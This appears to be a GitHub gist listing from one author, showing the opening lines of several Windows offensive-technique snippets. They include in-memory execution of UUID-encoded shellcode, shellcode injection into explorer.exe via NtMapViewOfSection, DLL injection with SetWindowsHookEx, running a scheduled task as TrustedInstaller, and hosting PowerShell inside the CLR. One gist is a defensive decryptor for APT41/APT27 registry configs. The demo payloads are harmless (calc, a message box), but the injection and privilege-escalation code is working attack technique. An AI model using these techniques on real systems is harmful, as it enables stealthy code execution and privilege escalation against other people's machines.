@farzinenddo
farzinenddo / uuid.c
Created March 22, 2021 23:29
Execute shellcode in memory by abusing the Windows API
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
const char* uuids[] =
{
"6850c031-6163-636c-5459-504092741551",
"2f728b64-768b-8b0c-760c-ad8b308b7e18",
farzinenddo / Find.Net.ps1
Created November 9, 2020 01:06
Finding .NET binaries
function Get-PEMetaData {
[CmdletBinding()]
param($Path)
try {
$FullPath = Resolve-Path -Path $Path -ErrorAction Stop
try {
$Null = [Reflection.AssemblyName]::GetAssemblyName($FullPath)
$Signature = Get-AuthenticodeSignature -FilePath $FullPath -ErrorAction SilentlyContinue
farzinenddo / ScheduledTask.ps1
Created May 6, 2020 21:54
Using a COM object to run a task under the "NT SERVICE\TrustedInstaller" token
$task = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c calc"
Register-ScheduledTask -TaskName "TestMe" -Action $task
$com.Connect()
$user = "NT SERVICE\TrustedInstaller"
$folder = $com.GetFolder('\')
$t = $folder.GetTask('TestMe')
$t.RunEx($null,0,0,$user)
farzinenddo / ExtraByte_ProcessInjection.cpp
Last active April 15, 2020 22:49
Injecting shellcode into explorer.exe with the ExtraByte and NtMapViewOfSection technique, not affected by CFG/CIG
#include "stdafx.h"
#include <Windows.h>
// messagebox(x64) shellcode
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
farzinenddo / dll.cpp
Last active April 1, 2020 19:54
Injecting a DLL by smashing the REF and SetWindowsHookEx
#include <Windows.h>
#include <string>
void job() {
TCHAR szExeFileName[MAX_PATH];
GetModuleFileName(NULL, szExeFileName, MAX_PATH);
std::wstring exeName = szExeFileName;
int pos = exeName.find_last_of(L"\\");
exeName = exeName.substr(pos + 1, exeName.length());
std::wstring message = L"Injected in " + exeName + L" (PID " + std::to_wstring(GetCurrentProcessId()) + L")";
farzinenddo / Powerless.cpp
Created March 23, 2020 18:44
Running PowerShell with the CLR in a native runtime.
#include <metahost.h>
#pragma comment(lib, "mscoree.lib")
int main(int argc, wchar_t* argv[])
{
HRESULT hr;
ICLRMetaHost *pMetaHost = NULL;
ICLRRuntimeInfo *pRuntimeInfo = NULL;
ICLRRuntimeHost *pClrRuntimeHost = NULL;
farzinenddo / apt41-registry-decryptor.ps1
Created March 12, 2020 00:40
Search the registry for config created by APT41 or APT27 and decrypt its contents
$CPU = (Get-ItemProperty HKLM:\HARDWARE\DESCRIPTION\System\CentralProcessor\0\).Identifier
$value = ls "Registry::HKEY_CLASSES_ROOT\$CPU*"
$key = [System.Text.Encoding]::UTF8.GetBytes([System.Text.Encoding]::UTF8.GetString($CPU.Substring(0,8)))
$iv = $key
$provider = New-Object System.Security.Cryptography.DESCryptoServiceProvider
$provider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$provider.Padding = [System.Security.Cryptography.PaddingMode]::None
$decryptor = $provider.CreateDecryptor($key, $iv)